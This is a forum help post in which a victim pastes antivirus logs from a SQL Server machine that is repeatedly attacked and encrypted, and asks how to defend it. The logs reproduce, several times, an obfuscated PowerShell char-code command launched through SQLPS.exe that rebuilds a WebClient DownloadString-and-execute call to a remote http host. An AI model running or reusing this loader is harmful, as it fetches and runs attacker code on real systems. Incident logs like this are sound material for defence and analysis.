好友
阅读权限10
听众
最后登录1970-1-1
|
200吾爱币
【1】2025-12-29 11:13:52,病毒防护,内存防护,发现病毒Backdoor/CobaltStrike.lj, 暂不处理
病毒名称:Backdoor/CobaltStrike.lj
病毒ID:FFCEFA196C4C9722
虚拟地址:0x000000001D460000
映像大小:8.0KB
是否完整映像:否
数据流哈希:454f7
操作结果:暂不处理
进程ID:7928
操作进程:C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\SQLPS.exe
操作进程命令行:sqlps .( $eNv:COMSpeC[4,26,25]-JOin'') ([sTring]::JoIN('', [chAR[]]( 46 , 40 ,34, 123 , 49 , 125 , 123 ,48, 125 ,34 , 45,102 , 32,39,88 , 39 ,44,39, 73,69, 39 , 41 ,32 ,40, 40 , 46 ,40, 34, 123, 49 , 125 , 123,50, 125 , 123 ,48 ,125 , 34,45 ,102 , 39 , 111 ,98 ,106,101 ,99 , 116,39,44, 39, 110,101 , 39, 44 , 39, 119,45 , 39,41,32, 40 ,34 , 123 , 48, 125 , 123, 50 ,125, 123, 51,125 , 123 ,49 ,125 ,34 ,45,102,32 , 39 ,110 ,101 ,116,46,39,44 , 39, 116 ,39 ,44,39 ,119,101 , 39, 44 ,39 ,98,99 ,108,105 , 101 ,110 , 39 , 41 , 41 ,46,40,34 , 123 ,52 , 125,123, 51,125 ,123 , 49, 125, 123, 50 , 125,123 ,48,125,34 ,45 , 102, 32 ,39, 114,105 ,110, 103 ,39,44 ,39 ,108,111, 39, 44, 39,97,100, 115 ,116 , 39, 44 ,39, 110,39 , 44 , 39, 100 , 111 , 119 , 39 , 41 , 46 , 73, 110,118, 111 , 107, 101 ,40,40, 34, 123,52, 125 , 123,51,125,123, 50 , 125 , 123 ,48, 125 , 123 ,53,125 , 123, 49 ,125 , 34 ,45, 102,39, 52,46,49,39,44, 39, 100 , 39 , 44,39 ,46 ,49,49 ,39, 44,39, 47, 47 , 52,53 ,39, 44,39 , 104, 116,116, 112 , 58 ,39 , 44
父进程ID:436
父进程:C:\Windows\System32\cmd.exe
父进程命令行:"C:\Windows\system32\cmd.exe" /c sqlps .( $eNv:COMSpeC[4,26,25]-JOin'') ([sTring]::JoIN('', [chAR[]]( 46 , 40 ,34, 123 , 49 , 125 , 123 ,48, 125 ,34 , 45,102 , 32,39,88 , 39 ,44,39, 73,69, 39 , 41 ,32 ,40, 40 , 46 ,40, 34, 123, 49 , 125 , 123,50, 125 , 123 ,48 ,125 , 34,45 ,102 , 39 , 111 ,98 ,106,101 ,99 , 116,39,44, 39, 110,101 , 39, 44 , 39, 119,45 , 39,41,32, 40 ,34 , 123 , 48, 125 , 123, 50 ,125, 123, 51,125 , 123 ,49 ,125 ,34 ,45,102,32 , 39 ,110 ,101 ,116,46,39,44 , 39, 116 ,39 ,44,39 ,119,101 , 39, 44 ,39 ,98,99 ,108,105 , 101 ,110 , 39 , 41 , 41 ,46,40,34 , 123 ,52 , 125,123, 51,125 ,123 , 49, 125, 123, 50 , 125,123 ,48,125,34 ,45 , 102, 32 ,39, 114,105 ,110, 103 ,39,44 ,39 ,108,111, 39, 44, 39,97,100, 115 ,116 , 39, 44 ,39, 110,39 , 44 , 39, 100 , 111 , 119 , 39 , 41 , 46 , 73, 110,118, 111 , 107, 101 ,40,40, 34, 123,52, 125 , 123,51,125,123, 50 , 125 , 123 ,48, 125 , 123 ,53,125 , 123, 49 ,125 , 34 ,45, 102,39, 52,46,49,39,44, 39, 100 , 39 , 44,39 ,46 ,49,49 ,39, 44,39, 47, 47 , 52,53 ,39, 44,39 ,
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【2】2025-12-29 11:13:52,病毒防护,内存防护,发现病毒Backdoor/CobaltStrike.l, 暂不处理
病毒名称:Backdoor/CobaltStrike.l
病毒ID:7E662B652271E28F
虚拟地址:0x000000001D170000
映像大小:4.0KB
是否完整映像:否
数据流哈希:454f7
操作结果:暂不处理
进程ID:7928
操作进程:C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\SQLPS.exe
操作进程命令行:sqlps .( $eNv:COMSpeC[4,26,25]-JOin'') ([sTring]::JoIN('', [chAR[]]( 46 , 40 ,34, 123 , 49 , 125 , 123 ,48, 125 ,34 , 45,102 , 32,39,88 , 39 ,44,39, 73,69, 39 , 41 ,32 ,40, 40 , 46 ,40, 34, 123, 49 , 125 , 123,50, 125 , 123 ,48 ,125 , 34,45 ,102 , 39 , 111 ,98 ,106,101 ,99 , 116,39,44, 39, 110,101 , 39, 44 , 39, 119,45 , 39,41,32, 40 ,34 , 123 , 48, 125 , 123, 50 ,125, 123, 51,125 , 123 ,49 ,125 ,34 ,45,102,32 , 39 ,110 ,101 ,116,46,39,44 , 39, 116 ,39 ,44,39 ,119,101 , 39, 44 ,39 ,98,99 ,108,105 , 101 ,110 , 39 , 41 , 41 ,46,40,34 , 123 ,52 , 125,123, 51,125 ,123 , 49, 125, 123, 50 , 125,123 ,48,125,34 ,45 , 102, 32 ,39, 114,105 ,110, 103 ,39,44 ,39 ,108,111, 39, 44, 39,97,100, 115 ,116 , 39, 44 ,39, 110,39 , 44 , 39, 100 , 111 , 119 , 39 , 41 , 46 , 73, 110,118, 111 , 107, 101 ,40,40, 34, 123,52, 125 , 123,51,125,123, 50 , 125 , 123 ,48, 125 , 123 ,53,125 , 123, 49 ,125 , 34 ,45, 102,39, 52,46,49,39,44, 39, 100 , 39 , 44,39 ,46 ,49,49 ,39, 44,39, 47, 47 , 52,53 ,39, 44,39 , 104, 116,116, 112 , 58 ,39 , 44
父进程ID:436
父进程:C:\Windows\System32\cmd.exe
父进程命令行:"C:\Windows\system32\cmd.exe" /c sqlps .( $eNv:COMSpeC[4,26,25]-JOin'') ([sTring]::JoIN('', [chAR[]]( 46 , 40 ,34, 123 , 49 , 125 , 123 ,48, 125 ,34 , 45,102 , 32,39,88 , 39 ,44,39, 73,69, 39 , 41 ,32 ,40, 40 , 46 ,40, 34, 123, 49 , 125 , 123,50, 125 , 123 ,48 ,125 , 34,45 ,102 , 39 , 111 ,98 ,106,101 ,99 , 116,39,44, 39, 110,101 , 39, 44 , 39, 119,45 , 39,41,32, 40 ,34 , 123 , 48, 125 , 123, 50 ,125, 123, 51,125 , 123 ,49 ,125 ,34 ,45,102,32 , 39 ,110 ,101 ,116,46,39,44 , 39, 116 ,39 ,44,39 ,119,101 , 39, 44 ,39 ,98,99 ,108,105 , 101 ,110 , 39 , 41 , 41 ,46,40,34 , 123 ,52 , 125,123, 51,125 ,123 , 49, 125, 123, 50 , 125,123 ,48,125,34 ,45 , 102, 32 ,39, 114,105 ,110, 103 ,39,44 ,39 ,108,111, 39, 44, 39,97,100, 115 ,116 , 39, 44 ,39, 110,39 , 44 , 39, 100 , 111 , 119 , 39 , 41 , 46 , 73, 110,118, 111 , 107, 101 ,40,40, 34, 123,52, 125 , 123,51,125,123, 50 , 125 , 123 ,48, 125 , 123 ,53,125 , 123, 49 ,125 , 34 ,45, 102,39, 52,46,49,39,44, 39, 100 , 39 , 44,39 ,46 ,49,49 ,39, 44,39, 47, 47 , 52,53 ,39, 44,39 ,
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【3】2025-12-29 11:12:39,病毒防护,文件实时监控,发现病毒Exploit/Vulndriver.o, 已处理
病毒名称:Exploit/Vulndriver.o
病毒ID:CC77A44FC3ED93CB
病毒路径:C:\Windows\System32\k2
操作类型:修改
操作结果:已处理,删除文件
进程ID:7928
操作进程:C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\SQLPS.exe
操作进程命令行:sqlps .( $eNv:COMSpeC[4,26,25]-JOin'') ([sTring]::JoIN('', [chAR[]]( 46 , 40 ,34, 123 , 49 , 125 , 123 ,48, 125 ,34 , 45,102 , 32,39,88 , 39 ,44,39, 73,69, 39 , 41 ,32 ,40, 40 , 46 ,40, 34, 123, 49 , 125 , 123,50, 125 , 123 ,48 ,125 , 34,45 ,102 , 39 , 111 ,98 ,106,101 ,99 , 116,39,44, 39, 110,101 , 39, 44 , 39, 119,45 , 39,41,32, 40 ,34 , 123 , 48, 125 , 123, 50 ,125, 123, 51,125 , 123 ,49 ,125 ,34 ,45,102,32 , 39 ,110 ,101 ,116,46,39,44 , 39, 116 ,39 ,44,39 ,119,101 , 39, 44 ,39 ,98,99 ,108,105 , 101 ,110 , 39 , 41 , 41 ,46,40,34 , 123 ,52 , 125,123, 51,125 ,123 , 49, 125, 123, 50 , 125,123 ,48,125,34 ,45 , 102, 32 ,39, 114,105 ,110, 103 ,39,44 ,39 ,108,111, 39, 44, 39,97,100, 115 ,116 , 39, 44 ,39, 110,39 , 44 , 39, 100 , 111 , 119 , 39 , 41 , 46 , 73, 110,118, 111 , 107, 101 ,40,40, 34, 123,52, 125 , 123,51,125,123, 50 , 125 , 123 ,48, 125 , 123 ,53,125 , 123, 49 ,125 , 34 ,45, 102,39, 52,46,49,39,44, 39, 100 , 39 , 44,39 ,46 ,49,49 ,39, 44,39, 47, 47 , 52,53 ,39, 44,39 , 104, 116,116, 112 , 58 ,39 , 44
父进程ID:436
父进程:C:\Windows\System32\cmd.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【4】2025-12-29 11:12:36,病毒防护,文件实时监控,发现病毒Exploit/Vulndriver.q, 已处理
病毒名称:Exploit/Vulndriver.q
病毒ID:9FF896CC655F8112
病毒路径:C:\Windows\System32\t2
操作类型:修改
操作结果:已处理,删除文件
进程ID:7928
操作进程:C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\SQLPS.exe
操作进程命令行:sqlps .( $eNv:COMSpeC[4,26,25]-JOin'') ([sTring]::JoIN('', [chAR[]]( 46 , 40 ,34, 123 , 49 , 125 , 123 ,48, 125 ,34 , 45,102 , 32,39,88 , 39 ,44,39, 73,69, 39 , 41 ,32 ,40, 40 , 46 ,40, 34, 123, 49 , 125 , 123,50, 125 , 123 ,48 ,125 , 34,45 ,102 , 39 , 111 ,98 ,106,101 ,99 , 116,39,44, 39, 110,101 , 39, 44 , 39, 119,45 , 39,41,32, 40 ,34 , 123 , 48, 125 , 123, 50 ,125, 123, 51,125 , 123 ,49 ,125 ,34 ,45,102,32 , 39 ,110 ,101 ,116,46,39,44 , 39, 116 ,39 ,44,39 ,119,101 , 39, 44 ,39 ,98,99 ,108,105 , 101 ,110 , 39 , 41 , 41 ,46,40,34 , 123 ,52 , 125,123, 51,125 ,123 , 49, 125, 123, 50 , 125,123 ,48,125,34 ,45 , 102, 32 ,39, 114,105 ,110, 103 ,39,44 ,39 ,108,111, 39, 44, 39,97,100, 115 ,116 , 39, 44 ,39, 110,39 , 44 , 39, 100 , 111 , 119 , 39 , 41 , 46 , 73, 110,118, 111 , 107, 101 ,40,40, 34, 123,52, 125 , 123,51,125,123, 50 , 125 , 123 ,48, 125 , 123 ,53,125 , 123, 49 ,125 , 34 ,45, 102,39, 52,46,49,39,44, 39, 100 , 39 , 44,39 ,46 ,49,49 ,39, 44,39, 47, 47 , 52,53 ,39, 44,39 , 104, 116,116, 112 , 58 ,39 , 44
父进程ID:436
父进程:C:\Windows\System32\cmd.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【5】2025-12-29 11:12:33,病毒防护,文件实时监控,发现病毒Exploit/Vulndriver.m, 已处理
病毒名称:Exploit/Vulndriver.m
病毒ID:00AF2F14CBCE0F35
病毒路径:C:\Windows\System32\n2
操作类型:修改
操作结果:已处理,删除文件
进程ID:7928
操作进程:C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\SQLPS.exe
操作进程命令行:sqlps .( $eNv:COMSpeC[4,26,25]-JOin'') ([sTring]::JoIN('', [chAR[]]( 46 , 40 ,34, 123 , 49 , 125 , 123 ,48, 125 ,34 , 45,102 , 32,39,88 , 39 ,44,39, 73,69, 39 , 41 ,32 ,40, 40 , 46 ,40, 34, 123, 49 , 125 , 123,50, 125 , 123 ,48 ,125 , 34,45 ,102 , 39 , 111 ,98 ,106,101 ,99 , 116,39,44, 39, 110,101 , 39, 44 , 39, 119,45 , 39,41,32, 40 ,34 , 123 , 48, 125 , 123, 50 ,125, 123, 51,125 , 123 ,49 ,125 ,34 ,45,102,32 , 39 ,110 ,101 ,116,46,39,44 , 39, 116 ,39 ,44,39 ,119,101 , 39, 44 ,39 ,98,99 ,108,105 , 101 ,110 , 39 , 41 , 41 ,46,40,34 , 123 ,52 , 125,123, 51,125 ,123 , 49, 125, 123, 50 , 125,123 ,48,125,34 ,45 , 102, 32 ,39, 114,105 ,110, 103 ,39,44 ,39 ,108,111, 39, 44, 39,97,100, 115 ,116 , 39, 44 ,39, 110,39 , 44 , 39, 100 , 111 , 119 , 39 , 41 , 46 , 73, 110,118, 111 , 107, 101 ,40,40, 34, 123,52, 125 , 123,51,125,123, 50 , 125 , 123 ,48, 125 , 123 ,53,125 , 123, 49 ,125 , 34 ,45, 102,39, 52,46,49,39,44, 39, 100 , 39 , 44,39 ,46 ,49,49 ,39, 44,39, 47, 47 , 52,53 ,39, 44,39 , 104, 116,116, 112 , 58 ,39 , 44
父进程ID:436
父进程:C:\Windows\System32\cmd.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【6】2025-12-29 09:49:19,其他,升级日志,自动更新成功,版本号:6.0.8.4
升级方式:自动更新
升级结果:成功,版本号:6.0.8.4,病毒库时间:2025-12-28 19:16
下载文件:
2025-12-29 09:49:19 C:\ProgramData\Huorong\Sysdiag\virdb\hwl.db
2025-12-29 09:49:19 C:\ProgramData\Huorong\Sysdiag\virdb\troj.db
2025-12-29 09:49:19 C:\ProgramData\Huorong\Sysdiag\db\malurl.db
2025-12-29 09:49:19 C:\ProgramData\Huorong\Sysdiag\db\urlcls.db
更新文件:
2025-12-29 09:49:19 C:\ProgramData\Huorong\Sysdiag\virdb\hwl.db
2025-12-29 09:49:19 C:\ProgramData\Huorong\Sysdiag\virdb\troj.db
2025-12-29 09:49:19 C:\ProgramData\Huorong\Sysdiag\db\malurl.db
2025-12-29 09:49:19 C:\ProgramData\Huorong\Sysdiag\db\urlcls.db
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【7】2025-12-29 09:21:43,系统防护,软件安装拦截,OfficeClickToRun.exe尝试安装软件,已阻止
文件路径:C:\Program Files\Common Files\microsoft shared\ClickToRun\OnlineInteraction\46da4f2f-e90b-4b4d-804d-aff94a326663_11df\MSOfficePLUS.exe
安装软件:MSOfficePLUS
操作结果:已阻止
进程ID:7788
操作进程:C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【8】2025-12-29 08:49:21,其他,升级日志,自动更新成功,版本号:6.0.8.4
升级方式:自动更新
升级结果:成功,版本号:6.0.8.4,病毒库时间:2025-12-27 19:58
下载文件:
2025-12-29 08:49:20 C:\ProgramData\Huorong\Sysdiag\virdb\prop.db
2025-12-29 08:49:20 C:\ProgramData\Huorong\Sysdiag\virdb\pset.db
2025-12-29 08:49:20 C:\ProgramData\Huorong\Sysdiag\virdb\crithash.db
2025-12-29 08:49:20 C:\ProgramData\Huorong\Sysdiag\virdb\troj.db
2025-12-29 08:49:20 C:\ProgramData\Huorong\Sysdiag\db\hips.db
2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\db\behav.db
2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\db\malurl.db
2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\db\urlcls.db
2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\db\appprot.db
更新文件:
2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\virdb\prop.db
2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\virdb\pset.db
2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\virdb\crithash.db
2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\virdb\troj.db
2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\db\hips.db
2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\db\behav.db
2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\db\malurl.db
2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\db\urlcls.db
2025-12-29 08:49:21 C:\ProgramData\Huorong\Sysdiag\db\appprot.db
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
这是火绒的日志,此数据库文件经常被攻击加密
有两个限制
1、内外网IP无法变
2、数据库端口号无法变 |
|